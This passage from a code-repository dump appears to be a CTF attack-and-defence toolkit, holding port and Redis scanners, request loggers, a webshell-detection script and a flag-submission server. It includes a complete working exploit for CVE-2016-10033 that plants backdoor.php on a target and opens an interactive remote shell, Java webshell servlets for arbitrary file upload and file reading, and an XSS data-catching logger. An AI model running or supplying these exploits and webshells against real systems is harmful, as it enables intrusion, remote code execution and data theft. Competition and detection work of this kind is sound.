47 | return str(port) + " : " + PORT_TABLE[port] + " : " + str(result)
48 |
49 |
50 | def run(arg):
51 | data = {
52 | "ip": "",
53 | "timeout": 5
54 | }
55 | if len(arg) < 2:
56 | return 'Error'
57 | data['ip'] = arg[0]
58 | ports = arg[1].split(",")
59 | if len(arg) > 3:
60 | data['timeout'] = int(arg[2])
61 | if len(ports) == 1:
62 | data['port'] = int(arg[1])
63 | return scan(**data)
64 | else:
65 | return [scan(port=int(i), **data) for i in ports]
66 |
67 | if __name__ == '__main__':
68 | for i in range(256):
69 | print("192.168.5.%d" % i)
70 | print run(["192.168.5.%d" % i, "80"])
71 |
--------------------------------------------------------------------------------
/flowscript/phpwaf.php:
--------------------------------------------------------------------------------
1 | filepath = $filepath;
8 | $this->header = array();
9 | }
10 |
11 | public function Flow()
12 | {
13 | $arr = array('HTTP_HOST','HTTP_USER_AGENT','HTTP_ACCEPT','HTTP_ACCEPT_LANGUAGE','HTTP_ACCEPT_ENCODING','HTTP_REFERER','HTTP_COOKIE','HTTP_X_FORWARDED_FOR','HTTP_CONNECTION');
14 | $HTTP_Method = $_SERVER['REQUEST_METHOD'];
15 | $server = $_SERVER;
16 | $Allfilepath = $this->filepath.'/'.date('Y-m-d-h').".log";
17 | foreach($arr as $value){
18 | $this->header[$value] = $server[$value];
19 | }
20 | $head = '';
21 | foreach ($this->header as $key => $value){
22 | if(stripos($key, 'HTTP_') == -1){
23 | $key = ucwords(strtolower($key));
24 | }else{
25 | $key = ucwords(strtolower(substr($key, 5)));
26 | }
27 | $head.= $key.': '.$value."\r\n";
28 | }
29 | $request_url = $_SERVER['REQUEST_URI'];
30 | $protocol = $_SERVER['SERVER_PROTOCOL'];
31 | $post = file_get_contents('php://input');
32 | $ip = $_SERVER['REMOTE_ADDR'];
33 | $time = date('Y/m/d h:i:s');
34 | $content = $ip."\t".$time."\t\n".$HTTP_Method.' '.$request_url.' '.$protocol."\r\n".$head."\n\n".$post."\n\n";
35 | $this->WriteFile($Allfilepath,$content,FILE_APPEND);
36 | }
37 |
38 | public function WriteFile($filepath,$content,$FILE_APPEND=FILE_APPEND)
39 | {
40 | file_put_contents($filepath,$content,$FILE_APPEND);
41 | }
42 | }
43 |
44 | $Catchs = new WafLog('/tmp/');
45 | $Catchs->Flow();
46 | ?>
--------------------------------------------------------------------------------
/crypto/base64_encode_custom_table.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // const char * base64Table = "BADCFEHGIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
5 |
6 | const char * base64Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
7 |
8 | char * base64_encode(const unsigned char * bindata, char * base64, int binlength)
9 | {
10 | int i, j;
11 | unsigned char current;
12 |
13 | for (i = 0, j = 0; i < binlength; i += 3)
14 | {
15 | current = (bindata[i] >> 2);
16 | current &= (unsigned char)0x3F;
17 | base64[j++] = base64Table[(int)current];
18 |
19 | current = ((unsigned char)(bindata[i] << 4)) & ((unsigned char)0x30);
20 | if (i + 1 >= binlength)
21 | {
22 | base64[j++] = base64Table[(int)current];
23 | base64[j++] = '=';
24 | base64[j++] = '=';
25 | break;
26 | }
27 | current |= ((unsigned char)(bindata[i + 1] >> 4)) & ((unsigned char)0x0F);
28 | base64[j++] = base64Table[(int)current];
29 |
30 | current = ((unsigned char)(bindata[i + 1] << 2)) & ((unsigned char)0x3C);
31 | if (i + 2 >= binlength)
32 | {
33 | base64[j++] = base64Table[(int)current];
34 | base64[j++] = '=';
35 | break;
36 | }
37 | current |= ((unsigned char)(bindata[i + 2] >> 6)) & ((unsigned char)0x03);
38 | base64[j++] = base64Table[(int)current];
39 |
40 | current = ((unsigned char)bindata[i + 2]) & ((unsigned char)0x3F);
41 | base64[j++] = base64Table[(int)current];
42 | }
43 | base64[j] = '\0';
44 | return base64;
45 | }
46 |
47 | int main(int argc, char ** argv){
48 | unsigned char bindata[2048];
49 | char base64[4096];
50 | if(argc > 1){
51 | // sprintf(bindata, argv[1]);
52 | printf("%s\n", base64_encode(bindata, base64, 2048));
53 | }else{
54 | printf("Error : argc=%d < 2\n", argc);
55 | }
56 | }
--------------------------------------------------------------------------------
/scripts/htpasswd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
3 | export PATH
4 |
5 | echo "====================================="
6 | echo "# A tool like htpasswd for Nginx #"
7 | echo "#-----------------------------------#"
8 | echo "# Author : Virink #"
9 | echo "====================================="
10 |
11 | #set UserName
12 | username=""
13 | read -p "Please input UserName:" username
14 | if [ "$username" = "" ]; then
15 | echo "Error:UserName can't be NULL!"
16 | exit 1
17 | fi
18 | echo "==========================="
19 | echo "UserName was: $username"
20 | echo "==========================="
21 |
22 | #set password
23 | unpassword=""
24 | read -p "Please input the Password:" unpassword
25 | if [ "$unpassword" = "" ]; then
26 | echo "Error:Password can't be NULL!"
27 | exit 1
28 | fi
29 | echo "==========================="
30 | echo "Password was: $unpassword"
31 | echo "==========================="
32 | password=$(perl -e 'print crypt($ARGV[0], "pwdsalt")' $unpassword)
33 |
34 |
35 | #set htpasswd file
36 | htfile=""
37 | read -p "Please input Auth filename:" htfile
38 | if [ "$htfile" = "" ]; then
39 | echo "Error:Auth filename can't be NULL!"
40 | exit 1
41 | fi
42 | echo "==========================="
43 | echo "Auth File: /etc/nginx/$htfile"
44 | echo "==========================="
45 |
46 | get_char()
47 | {
48 | SAVEDSTTY=`stty -g`
49 | stty -echo
50 | stty cbreak
51 | dd if=/dev/tty bs=1 count=1 2> /dev/null
52 | stty -raw
53 | stty echo
54 | stty $SAVEDSTTY
55 | }
56 | echo ""
57 | echo "Press any key to Creat...or Press Ctrl+c to cancel"
58 | char=`get_char`
59 |
60 | if [ ! -f /etc/nginx/$htfile.conf ]; then
61 | make -p /etc/nginx/$htfile.conf
62 | echo "Create Auth file......"
63 | cat >/etc/nginx/$htfile.conf< -p ")
49 | '''
50 | 调用optparse.OptionParser([usage message])方法生成一个
51 | 参数解析器类的实例。
52 | '''
53 | parser.add_option('-H', dest='tgtHost', type='string',
54 | help='specify target host')
55 | parser.add_option('-p', dest='tgtPort', type='string',
56 | help='specify target port[s] separated by comma')
57 | (options, args) = parser.parse_args()
58 | tgtHost = options.tgtHost
59 | tgtPorts = str(options.tgtPort).split(',')
60 | if(tgtHost == None) | (tgtPorts[0] == None):
61 | print parser.usage
62 | exit(0)
63 | portScan(tgtHost, tgtPorts)
64 |
65 | if __name__ == '__main__':
66 | main()
67 |
--------------------------------------------------------------------------------
/awd/wordpress_phpmailer_exploit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # CVE-2016-10033 exploit by opsxcq
3 | # https://github.com/opsxcq/exploit-CVE-2016-10033
4 |
5 | echo '[+] CVE-2016-10033 exploit by opsxcq'
6 |
7 | if [ -z "$1" ]
8 | then
9 | echo '[-] Please inform an host as parameter'
10 | exit -1
11 | fi
12 |
13 | if [ $(uname) == 'Darwin' ]
14 | then
15 | decoder='base64 -D'
16 | elif [ $(uname) == 'Linux' ]
17 | then
18 | decoder='base64 -d'
19 | else
20 | echo '[-] Your platform isnt supported: '$(uname)
21 | exit -1
22 | fi
23 |
24 |
25 | host=$1
26 |
27 | echo '[+] Exploiting '$host
28 |
29 | curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\n\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
30 |
31 |
32 | echo '[+] Checking if the backdoor was created on target system'
33 | code=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n' "http://$host/backdoor.php")
34 |
35 | if [ "$code" != "200" ]
36 | then
37 | echo '[-] Target cant be exploited'
38 | exit -1
39 | else
40 | echo '[+] Backdoor.php found on remote system'
41 | fi
42 |
43 | cmd='whoami'
44 | while [ "$cmd" != 'exit' ]
45 | do
46 | echo '[+] Running '$cmd
47 | if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder
48 | then
49 | echo '[-] Connection problens'
50 | exit -1
51 | fi
52 | echo
53 | read -p 'RemoteShell> ' cmd
54 | done
55 | echo '[+] Exiting'
56 |
--------------------------------------------------------------------------------
/flowscript/flow.php:
--------------------------------------------------------------------------------
1 | flowdata = array();
8 | $this->redirect = false;
9 | $this->logfiles = "/tmp/flow.log";
10 | $this->Flow();
11 | }
12 |
13 | public function Flow()
14 | {
15 | /* Method */
16 | $this->flowdata['method'] = $_SERVER['REQUEST_METHOD'];
17 | /* Header */
18 | $arr = array(
19 | 'HTTP_HOST',
20 | 'HTTP_REFERER',
21 | 'HTTP_USER_AGENT'
22 | );
23 | foreach($arr as $key){
24 | $this->flowdata['header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = $_SERVER[$key];
25 | }
26 | /* Url */
27 | $this->flowdata['uri'] = $_SERVER['REQUEST_URI'];
28 | /* Protocol */
29 | $this->flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL'];
30 | /* IP */
31 | $this->flowdata['ip'] = array(
32 | 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
33 | 'CLIENT_IP'=>$_SERVER['HTTP_CLIENT_IP'],
34 | 'X_FORWARDED_FOR'=>$_SERVER['HTTP_X_FORWARDED_FOR']
35 | );
36 | /* Time */
37 | $this->flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']);
38 | /* CONTENT_TYPE */
39 | $this->flowdata['ctype'] = $_SERVER['CONTENT_TYPE'];
40 | /* GetData ??? */
41 | $this->flowdata['get'] = json_encode($_GET);
42 | /* PostData */
43 | if(isset($_POST) or strtolower($this->flowdata['Method']) == 'post' ){
44 | if($this->flowdata['ctype'] == 'application/x-www-form-urlencoded'){
45 | $this->flowdata['post'] = json_encode($_POST);
46 | }else{
47 | $this->flowdata['post'] = file_get_contents('php://input');
48 | }
49 | }
50 | $this->Send("null");
51 | }
52 |
53 | public function Send($keyword)
54 | {
55 | $data = $this->flowdata;
56 | file_put_contents($this->logfiles,"\r\n".$keyword."\r\n".print_r($data,true)."\r\n=====================================\r\n",FILE_APPEND);
57 | return 0;
58 | }
59 | }
60 |
61 | new PhpFlowLog();
--------------------------------------------------------------------------------
/webshell/jsp/UpServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * UpServlet.java 29/04/2005
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
13 | public class UpServlet extends HttpServlet {
14 |
15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | res.setContentType("text/html");
17 | PrintWriter out = res.getWriter();
18 | out.print("");
19 | out.print("
");
23 | out.print("");
24 | }
25 |
26 |
27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
28 | String tag = new String();
29 | int c = '\0';
30 | int contador = 0;
31 | ServletInputStream in = req.getInputStream();
32 | DataInputStream post = new DataInputStream(in);
33 |
34 | PrintWriter out = res.getWriter();
35 | res.setContentType("text/html");
36 | out.print("");
37 |
38 | while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | tag=tag.concat("" + (char)c);
40 | contador++;
41 | }
42 |
43 | for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 |
45 | // out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | // out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 |
48 | // (!) Uploaded File Name
49 |
50 | File newfile = new File("c:\\install.log");
51 |
52 | /////////////////////////
53 |
54 | FileOutputStream fileout = new FileOutputStream(newfile);
55 |
56 | for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | c=post.read();
58 | fileout.write((char)c);
59 | }
60 |
61 | fileout.close();
62 | out.print("<== OK");
63 |
64 | }
65 |
66 |
67 | public String getServletInfo() {
68 | return "UpServlet 0.1";
69 | }
70 |
71 | }
--------------------------------------------------------------------------------
/webshell/servlet/UpServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * UpServlet.java 29/04/2005
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
13 | public class UpServlet extends HttpServlet {
14 |
15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | res.setContentType("text/html");
17 | PrintWriter out = res.getWriter();
18 | out.print("");
19 | out.print("
");
23 | out.print("");
24 | }
25 |
26 |
27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
28 | String tag = new String();
29 | int c = '\0';
30 | int contador = 0;
31 | ServletInputStream in = req.getInputStream();
32 | DataInputStream post = new DataInputStream(in);
33 |
34 | PrintWriter out = res.getWriter();
35 | res.setContentType("text/html");
36 | out.print("");
37 |
38 | while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | tag=tag.concat("" + (char)c);
40 | contador++;
41 | }
42 |
43 | for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 |
45 | // out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | // out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 |
48 | // (!) Uploaded File Name
49 |
50 | File newfile = new File("c:\\install.log");
51 |
52 | /////////////////////////
53 |
54 | FileOutputStream fileout = new FileOutputStream(newfile);
55 |
56 | for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | c=post.read();
58 | fileout.write((char)c);
59 | }
60 |
61 | fileout.close();
62 | out.print("<== OK");
63 |
64 | }
65 |
66 |
67 | public String getServletInfo() {
68 | return "UpServlet 0.1";
69 | }
70 |
71 | }
--------------------------------------------------------------------------------
/scripts/xssget.php:
--------------------------------------------------------------------------------
1 | filename = $filename;
8 | }
9 |
10 | public function Flow()
11 | {
12 | /* Method */
13 | $flowdata['method'] = $_SERVER['REQUEST_METHOD'];
14 | /* Header */
15 | $arr = array(
16 | 'HTTP_HOST',
17 | 'HTTP_REFERER',
18 | 'HTTP_USER_AGENT'
19 | // 'HTTP_ACCEPT',
20 | // 'HTTP_ACCEPT_LANGUAGE',
21 | // 'HTTP_ACCEPT_ENCODING',
22 | // 'HTTP_CONNECTION'
23 | );
24 | foreach($arr as $key){
25 | $flowdata['Header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = $_SERVER[$key];
26 | }
27 | /* Url */
28 | $flowdata['uri'] = $_SERVER['REQUEST_URI'];
29 | /* Protocol */
30 | $flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL'];
31 | /* IP */
32 | $flowdata['ip'] = array(
33 | 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
34 | 'CLIENT_IP'=>$_SERVER['HTTP_CLIENT_IP'],
35 | 'X_FORWARDED_FOR'=>$_SERVER['HTTP_X_FORWARDED_FOR']
36 | );
37 | /* Time */
38 | $flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']);
39 | /* CONTENT_TYPE */
40 | $flowdata['ctype'] = $_SERVER['CONTENT_TYPE'];
41 | /* PostData */
42 | if(isset($_POST) or strtolower($flowdata['Method']) == 'post' ){
43 | if($flowdata['ctype'] == 'application/x-www-form-urlencoded'){
44 | $flowdata['post'] = $_post;
45 | }else{
46 | $flowdata['post'] = file_get_contents('php://input');
47 | }
48 | }
49 | $this->WriteFile($this->filename,print_r($flowdata,true),FILE_APPEND);
50 | }
51 |
52 | public function WriteFile($filename,$content,$FILE_APPEND=FILE_APPEND)
53 | {
54 | file_put_contents($filename,$content,$FILE_APPEND);
55 | }
56 | }
57 |
58 | $Catchs = new GetFromXSS('log.txt');
59 | $Catchs->Flow();
60 | ?>
--------------------------------------------------------------------------------
/awd/flask_submit_flask.py:
--------------------------------------------------------------------------------
1 | # - coding:utf8
2 | from flask import *
3 | import requests
4 |
5 | app = Flask(__name__)
6 |
7 | url = "http://172.91.1.12:9090/arace/index"
8 | token = "0ade4d3d8b7ed42f"
9 |
10 | server_port = 3001
11 |
12 |
13 | def submit_token(url, answer, token):
14 | data = {"token": token, "flag": answer}
15 | resp = requests.post(url, data=data)
16 | if (resp.status_code != "404"):
17 | print "Status code:%d" % (resp.status_code)
18 |
19 |
20 | def submit_cookie(ip, answer):
21 | submit_ip = '172.91.1.12:9090'
22 | urls = 'http://%s/ad/hacker/submit/submitCode' % submit_ip
23 | post = {'flag': answer}
24 | '''cmder = ' %s -b "JSESSIONID=C64DD133EFDDB22CE5BE4CA3991AB6DF" -d "flag=%s"'% (urls,answer)
25 | #print cmd
26 | os.system('curl ' + cmder)'''
27 |
28 | header = {'Host': '172.91.1.12:9090',
29 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
30 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
31 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
32 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
33 | 'X-Requested-With': 'XMLHttpRequest',
34 | 'Referer': 'http://172.91.1.12:9090/arace/index',
35 | 'Content-Length': '14',
36 | 'Cookie': 'JSESSIONID=77A0AFA7757CE43018889FCF9AAFE59A'}
37 |
38 | req = requests.post(urls, headers=header, data=post)
39 | print req.content
40 | if 'errorInfo' not in req.content:
41 | print ' ' + req.content
42 |
43 |
44 | last_flag = {}
45 |
46 |
47 | @app.route('/flag', methods=['POST'])
48 | def receive_flag():
49 | flag = request.get_data().strip()
50 | ip = request.remote_addr
51 | if not last_flag.has_key(ip):
52 | last_flag[ip] = set()
53 | ip_flag_list = last_flag.get(ip, set())
54 | if flag in ip_flag_list:
55 | print "Receive %s from %s , already submitted." % (flag, ip)
56 | return ""
57 | ip_flag_list.add(flag)
58 | result = ""
59 | print "\nReceive from : %s\nflag : %s" % (ip, flag)
60 | submit_cookie(ip, flag)
61 | return ''
62 |
63 |
64 | if __name__ == '__main__':
65 | app.run("0.0.0.0", port=server_port)
66 |
--------------------------------------------------------------------------------
/tools/Rescan.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | #author=Cond0r@CodeScan
3 | import socket
4 | import threading
5 | from concurrent import futures
6 | from Queue import Queue
7 | from sys import argv
8 | import ipaddr
9 | import sys
10 | socket.setdefaulttimeout(3)
11 | data='''
12 | Lib:
13 | https://github.com/google/ipaddr-py
14 | https://pypi.python.org/pypi/futures
15 | pip install futures
16 | Usage:
17 | python rescan.py -f inputfile.txt
18 | inputfile.txt:
19 | 10.14.40.194:6379
20 | python rescan.py -i 192.168.1.1/24 -p 6379
21 | '''
22 | target_list=[]
23 | def stdout( name):
24 | scanow ='[*] Scan %s.. '%(name)
25 | sys.stdout.write(str(scanow)+" "*20+"\b\b\r")
26 | sys.stdout.flush()
27 | def extract_target(inputfile):
28 | global target_list
29 | inputdata=open(inputfile).read().replace("\r",'').split("\n")
30 | for host in inputdata:
31 | host=host.split(":")
32 | if len(host)==2:
33 | target_list.append("%s:%s"%(host[0],host[1]))
34 | elif len(host)==1:
35 | target_list.append("%s:6379"%(host[0]))
36 | return target_list
37 | def send_dbsize(conn):
38 | try:
39 | conn.send("dbsize\n")
40 | recv=conn.recv(5)
41 | conn.close()
42 | recv=recv.replace("\n",''),
43 | return recv
44 | except:
45 | return False
46 |
47 | def conn_redis(args):
48 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49 | args=args.split(":")
50 | host=args[0]
51 | port=int(args[1])
52 | try:
53 | client.connect((host, port))
54 | return client
55 | except:
56 | return False
57 | def run_task(target):
58 | stdout(target)
59 | conn=conn_redis(target)
60 | if conn:
61 | size=send_dbsize(conn)
62 | size=str(size)
63 | if 'NOAUTH' not in size and ':' in size:
64 | return "[!] Find %s Unauthorized "% target
65 | def main():
66 | targetlist=[]
67 | if len(argv)>2:
68 | if argv[1]=='-f':
69 | return extract_target(argv[2])
70 | if argv[1]=='-i':
71 | port=6379
72 | if len(argv)==5:
73 | port=int(argv[4])
74 | targets = ipaddr.IPv4Network(argv[2])
75 | for tar in targets:
76 | targetlist.append("%s:%d"%(tar,port))
77 | return targetlist
78 |
79 |
80 |
81 | if len(argv)<3:
82 | print data
83 | exit()
84 |
85 | target_list=main()
86 |
87 | thread_pool = futures.ThreadPoolExecutor(max_workers=10)
88 | for i in thread_pool.map(run_task, target_list):
89 | if i!=None:
90 | print i
91 |
--------------------------------------------------------------------------------
/tools/drcom/Decipher.java:
--------------------------------------------------------------------------------
1 | // 145014129 Nk(Ga!a
2 | // xxy145014129 Mk*Gd#a
3 |
4 | // javac filename
5 | // java classname
6 | public class Decipher {
7 |
8 | private static final int MIN_ASC = 32;
9 | private static final int MAX_ASC = 126;
10 | private static final int NUM_ASC = 95;
11 | private static final long MYPRIMENUMBER = 100537L;
12 | private static final long MYPRIMENUMBER2 = 100609L;
13 | private static final String KEYWORD = "TblRefreshCurMonthServiceUse";
14 |
15 |
16 | public static void main(String[] args)
17 | {
18 | System.out.println("============");
19 | // String from_text = "Nk(Ga!a";
20 | System.out.println(args[0]);
21 | String from_text = args[0];
22 | String a = Decipher(from_text);
23 | System.out.println(a);
24 | System.out.println("============");
25 | }
26 |
27 | public static String Decipher(String from_text)
28 | {
29 | char[] word = from_text.toCharArray();
30 | StringBuilder to_text = new StringBuilder();
31 | // long key = NumericPassword("TblRefreshCurMonthServiceUse");
32 | long key = 30137;
33 | int str_len = from_text.length() - 1;
34 | for (int i = 0; i < str_len; i++) {
35 | word[i] = from_text.charAt(i);
36 | int ch = word[i];
37 | if ((ch >= 32) && (ch <= 126)) {
38 | i++;
39 | ch -= 32;
40 | double offset = 96.0D * ( key * i % 100537L / 100537.0D);
41 | ch = (ch - (int)offset) % 95;
42 | if (ch < 0)
43 | ch += 95;
44 | ch += 32;
45 | i--;
46 | to_text.append((char)ch);
47 | }
48 | }
49 | return to_text.toString();
50 | }
51 | /*
52 | private static long NumericPassword(String password)
53 | {
54 | long shift1 = 0L;
55 | long shift2 = 0L;
56 | long value = 0L;
57 | int str_len = password.length();
58 | for (int i = 0; i < str_len; i++) {
59 | long ch = password.charAt(i);
60 | value ^= ch * MyIndex(shift1);
61 | value ^= ch * MyIndex(shift2);
62 | shift1 = (shift1 + 7L) % 19L;
63 | shift2 = (shift2 + 13L) % 23L;
64 | }
65 | value = (value ^ 0x18901) % 100537L;
66 | return value;
67 | }
68 |
69 | private static long MyIndex(long shadow)
70 | {
71 | long j = 1L;
72 | for (long i = 1L; i <= shadow; i += 1L)
73 | j *= 2L;
74 | return j;
75 | }
76 | */
77 | }
--------------------------------------------------------------------------------
/scripts/scanwebshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | #__Author__ = virink
5 | #__Blog__ = https://www.virzz.com
6 |
7 | import os
8 | import sys
9 | import commands
10 | import re
11 | import time
12 | import base64
13 | import platform
14 |
15 | rulelist = [
16 | '(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
17 | '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',
18 | '(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})',
19 | '((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
20 | '(\$[\w_]{0,15}(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
21 | '(call_user_func\(.{0,15}\$_(GET|POST|REQUEST))',
22 | '(preg_replace(\s|\n)*\(.{1,100}[/@].{0,3}e.{1,6},.{0,10}\$_(GET|POST|REQUEST))',
23 | '(wscript\.shell)',
24 | '(cmd\.exe)',
25 | '(shell\.application)',
26 | '(documents\s+and\s+settings)',
27 | '(serv-u)',
28 | '(phpspy)',
29 | '(jspspy)',
30 | '(webshell)',
31 | '(Program\s+Files)'
32 | ]
33 |
34 |
35 | def ScanShell(path):
36 | for root, dirs, files in os.walk(path):
37 | for filespath in files:
38 | if filespath.find('.php') > 0 or filespath.find('.inc') > 0:
39 | file = open(os.path.join(root, filespath))
40 | filestr = file.read()
41 | file.close()
42 | for rule in rulelist:
43 | result = re.compile(rule).findall(filestr)
44 | if result:
45 | print os.path.join(root, filespath) + '\r\n'
46 | break
47 |
48 | ##############################################
49 | if __name__ == '__main__':
50 | print '''
51 | \t\t#########################################
52 | \t\t# AppName : Scan Shell #
53 | \t\t# Author : Virink #
54 | \t\t# Blog : https://www.virzz.com #
55 | \t\t#########################################\r\n'''
56 | if platform.system() != 'Linux':
57 | print '\tPlease Run in Linux'
58 | exit()
59 | if len(sys.argv) != 2:
60 | print '\tRun error\r\n\tUsage:python ' + sys.argv[0] + ' website_path\r\n\teg : python ' + sys.argv[0] + ' /root/www\r\n'
61 | exit()
62 | webroot = sys.argv[1]
63 | # Start scan webshell
64 | print '\tStart scan webshell'
65 | ScanShell(webroot)
66 | print '\tFinish scan webshell'
67 |
--------------------------------------------------------------------------------
/webshell/jsp/ListServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * ListServlet.java
3 | *
4 | * @author Sierra
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 |
12 | public class ListServlet extends HttpServlet
13 | {
14 |
15 |
16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
17 | PrintWriter printwriter = res.getWriter();
18 | String path = req.getParameter("file");
19 |
20 | printwriter.write("\n\nDirectory Listing \n\n\n");
21 | printwriter.write("\n");
22 | if(req.getParameter("file")==null) path = "c:\\";
23 | printwriter.write("
Path: " + path + "
\n");
24 |
25 | File file = new File(path);
26 |
27 | if(file.isDirectory())
28 | {
29 | String s = new String("Unknown");
30 | String s2 = new String("Black");
31 | File afile[] = file.listFiles();
32 | for(int i = 0; i < afile.length; i++)
33 | {
34 | String s1 = new String(afile[i].toString());
35 | printwriter.write("(");
36 | String s3;
37 | if(afile[i].isDirectory())
38 | {
39 | printwriter.write("d");
40 | s1 = s1 + "/";
41 | s3 = new String("Blue");
42 | } else
43 | if(afile[i].isFile())
44 | {
45 | printwriter.write("-");
46 | s3 = new String("Green");
47 | } else
48 | {
49 | printwriter.write("?");
50 | s3 = new String("Red");
51 | }
52 | if(afile[i].canRead())
53 | printwriter.write("r");
54 | else
55 | printwriter.write("-");
56 | if(afile[i].canWrite())
57 | printwriter.write("w");
58 | else
59 | printwriter.write("-");
60 | printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n");
61 | }
62 |
63 | printwriter.write("
");
64 | } else
65 | if(file.canRead())
66 | {
67 | FileInputStream fileinputstream = new FileInputStream(file);
68 | int j = 0;
69 | while(j >= 0)
70 | {
71 | j = fileinputstream.read();
72 | printwriter.write(j);
73 | }
74 | fileinputstream.close();
75 | } else
76 | {
77 | printwriter.write("Can't Read file
");
78 | }
79 |
80 | }
81 |
82 |
83 | public String getServletInfo() {
84 | return "Directory Listing";
85 | }
86 | }
--------------------------------------------------------------------------------
/webshell/servlet/ListServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * ListServlet.java
3 | *
4 | * @author Sierra
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 |
12 | public class ListServlet extends HttpServlet
13 | {
14 |
15 |
16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
17 | PrintWriter printwriter = res.getWriter();
18 | String path = req.getParameter("file");
19 |
20 | printwriter.write("\n\nDirectory Listing \n\n\n");
21 | printwriter.write("\n");
22 | if(req.getParameter("file")==null) path = "c:\\";
23 | printwriter.write("
Path: " + path + "
\n");
24 |
25 | File file = new File(path);
26 |
27 | if(file.isDirectory())
28 | {
29 | String s = new String("Unknown");
30 | String s2 = new String("Black");
31 | File afile[] = file.listFiles();
32 | for(int i = 0; i < afile.length; i++)
33 | {
34 | String s1 = new String(afile[i].toString());
35 | printwriter.write("(");
36 | String s3;
37 | if(afile[i].isDirectory())
38 | {
39 | printwriter.write("d");
40 | s1 = s1 + "/";
41 | s3 = new String("Blue");
42 | } else
43 | if(afile[i].isFile())
44 | {
45 | printwriter.write("-");
46 | s3 = new String("Green");
47 | } else
48 | {
49 | printwriter.write("?");
50 | s3 = new String("Red");
51 | }
52 | if(afile[i].canRead())
53 | printwriter.write("r");
54 | else
